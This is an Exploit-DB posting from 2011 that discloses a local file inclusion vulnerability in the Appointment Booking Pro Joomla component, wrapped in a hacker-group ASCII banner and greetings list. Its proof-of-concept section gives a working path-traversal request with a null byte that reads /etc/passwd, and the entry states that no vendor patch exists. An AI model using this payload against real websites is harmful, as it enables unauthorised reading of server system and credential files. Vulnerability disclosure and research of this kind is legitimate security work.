Appointment Booking Pro Joomla Component LFI Vulnerability



EDB-ID: 17553 CVE: N/A OSVDB-ID: N/A
Author: Don Tukulesto Published: 2011-07-20 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Appointment Booking Pro is a native Joomla component
=================================
Last login: Tue Jun  7 2010 10:20:22 on ttys000
                                 ______                                 ___
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/ 

Author		: Don Tukulesto (root@indonesiancoder.com)
Homepage	: http://indonesiancoder.com
Published	: July 17, 2011
Tested On	: OS X 10.5.8
=================================


=================================
|	Software Info		|
=================================
[>] Vendor      : http://www.appointmentbookingpro.com/
[>] Software    : Appointment Booking Pro - ABPro
	      Appointment Booking Pro is an appointment booking or scheduling, web site component.
[>] Cost        : $59

I. Proof of Concept
=================================
index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================
Currently manufacturers do not provide patches or upgrades.


=================================

[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n

We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC

=================================